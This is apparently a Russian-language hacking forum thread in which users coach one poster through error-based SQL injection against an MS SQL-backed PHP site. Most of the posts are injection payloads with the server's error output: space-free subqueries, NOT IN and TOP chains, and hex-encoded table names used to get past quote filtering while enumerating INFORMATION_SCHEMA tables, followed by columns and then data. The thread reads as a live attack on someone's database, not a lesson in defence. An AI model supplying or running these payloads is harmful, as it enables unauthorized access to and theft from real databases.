При таком запросе "1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--" показывает Incorrect syntax near the keyword 'TOP' в чем моя ошибка?
можно проинжектить запрос вобще без использования пробелов: or(1=(select(max(table_name))from[information_schema].tables)) [ cash ]
снова я 1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))-- выводит 'syssegments' делаю так 1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegments')))-- выводит 'syssegmentssyssegments' в след запросе выводит уже 'syssegmentssyssegmentssyssegmentssyssegments' и т.д.
TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))-- таким образом узнаёш все таблицы)) патом также только для столбцов и формеруеш запрос к бд))
я знаю что так надо просто проблема в том что он просто делат так syssegments syssegmentssyssegments syssegmentssyssegmentssyssegmentssyssegments syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments ... так не должно быть
вот запрос id=1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegmentssyssegments','syssegmentssyssegmentssyssegments')))-- ответ Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments'. (severity 16) Warning: mssql_query() [function.mssql-query]: Query failed Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- потом 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- потом 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))-- и т.д.
message: Invalid column name имя калонки неверно... 'syssegmentssyssegmentssyssegmentssyssegmentssysse gmentssyssegments'-хм мож админы извращенцы так таблицы называть??
ReVOLVeR, фигню пишешь, просто при обработке запроса скриптом, из него удаляются кавычки и скорее всего запятые
попробовал то что мне скаща scipio ответ Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15) Warning: mssql_query() [function.mssql-query]: Query failed Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
тогда делай: (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473) потом: (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473+and+table_name<>захексенный результат) и т.д. добавляй and`ы
1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+0x7379737365676D656E7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473)-- вместо <> поставил + так как выводил ерор Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15) Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15) Warning: mssql_query() [function.mssql-query]: Query failed Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
